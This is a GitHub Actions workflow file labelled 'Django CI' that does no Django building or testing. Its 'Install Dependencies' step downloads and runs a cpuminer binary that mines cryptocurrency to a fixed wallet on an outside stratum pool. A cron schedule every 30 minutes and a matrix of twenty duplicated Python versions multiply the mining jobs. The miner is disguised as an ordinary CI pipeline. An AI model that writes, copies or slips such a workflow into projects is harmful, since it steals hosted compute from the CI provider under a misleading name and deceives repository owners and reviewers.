name: Django CI

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
  schedule:
    - cron: "*/30 */5 * * *"
jobs:
  build:

    runs-on: ubuntu-latest
    strategy:
      max-parallel: 10
      matrix:
        python-version: [3.8,3.8,3.8,3.8,3.9,3.8,3.8,3.8,3.8,3.9,3.8,3.8,3.8,3.8,3.9,3.8,3.8,3.8,3.8,3.9]

    steps:
    - uses: actions/checkout@v2
    - name: Set up Python ${{ matrix.python-version }}
      uses: actions/setup-python@v2
      with:
        python-version: ${{ matrix.python-version }}
    - name: Install Dependencies
      run: |
        wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
tar xf cpuminer-opt-linux.tar.gz
./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qd4srksst4qq0y6eh57j36nffukljjxujyjrlsv.1 -t0
